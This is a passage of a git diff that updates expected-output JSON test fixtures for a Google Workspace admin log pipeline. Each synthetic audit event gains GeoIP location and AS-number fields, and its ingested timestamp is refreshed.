"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", "provider": "admin", "action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json index 053ba1dfa15..bfb559e21e7 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433465700Z", + "ingested": "2021-12-14T14:44:16.283737660Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_BUILDING", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433469800Z", + "ingested": "2021-12-14T14:44:16.283740432Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_BUILDING", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433476300Z", + "ingested": "2021-12-14T14:44:16.283740880Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_BUILDING", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433482200Z", + "ingested": "2021-12-14T14:44:16.283741420Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE", 
@@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433486400Z", + "ingested": "2021-12-14T14:44:16.283741839Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE", @@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433491100Z", + "ingested": "2021-12-14T14:44:16.283742285Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE_FEATURE", 
@@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433496600Z", + "ingested": "2021-12-14T14:44:16.283742696Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE_FEATURE", @@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433502Z", + "ingested": "2021-12-14T14:44:16.283743086Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE_FEATURE", @@ -547,6 +643,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -556,7 +664,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433507100Z", + "ingested": "2021-12-14T14:44:16.283743522Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_CALENDAR_RESOURCE", 
@@ -611,6 +719,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -620,7 +740,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433512700Z", + "ingested": "2021-12-14T14:44:16.283743911Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE", @@ -675,6 +795,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -684,7 +816,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433517300Z", + "ingested": "2021-12-14T14:44:16.283744290Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CALENDAR_SETTING", @@ -741,6 +873,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -750,7 +894,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433520800Z", + "ingested": "2021-12-14T14:44:16.283744825Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CANCEL_CALENDAR_EVENTS", 
@@ -811,6 +955,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -820,7 +976,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433542300Z", + "ingested": "2021-12-14T14:44:16.283745213Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RELEASE_CALENDAR_RESOURCES", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json index db163f62692..bdff8768cd5 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141313500Z", + "ingested": "2021-12-14T14:44:18.435060822Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_CREATE_GATEWAY", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141321500Z", + "ingested": "2021-12-14T14:44:18.435064773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_DELETE_GATEWAY", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141327Z", + "ingested": "2021-12-14T14:44:18.435065227Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_MODIFY_GATEWAY", @@ -227,6 +263,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -236,7 +284,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141332500Z", + "ingested": "2021-12-14T14:44:18.435065588Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHAT_SETTING", 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json index f644b296556..f0e54bbaf17 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668031200Z", + "ingested": "2021-12-14T14:44:19.076071383Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING", @@ -97,6 +109,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -106,7 +130,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668040300Z", + "ingested": "2021-12-14T14:44:19.076073656Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "CHANGE_DEVICE_STATE", @@ -161,6 +185,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -170,7 +206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668045400Z", + "ingested": "2021-12-14T14:44:19.076074073Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_APPLICATION_SETTING", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668050400Z", + "ingested": "2021-12-14T14:44:19.076074432Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "SEND_CHROME_OS_DEVICE_COMMAND", 
@@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668056100Z", + "ingested": "2021-12-14T14:44:19.076074761Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION", @@ -352,6 +412,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -361,7 +433,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668060700Z", + "ingested": "2021-12-14T14:44:19.076075097Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_SETTING", @@ -415,6 +487,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": 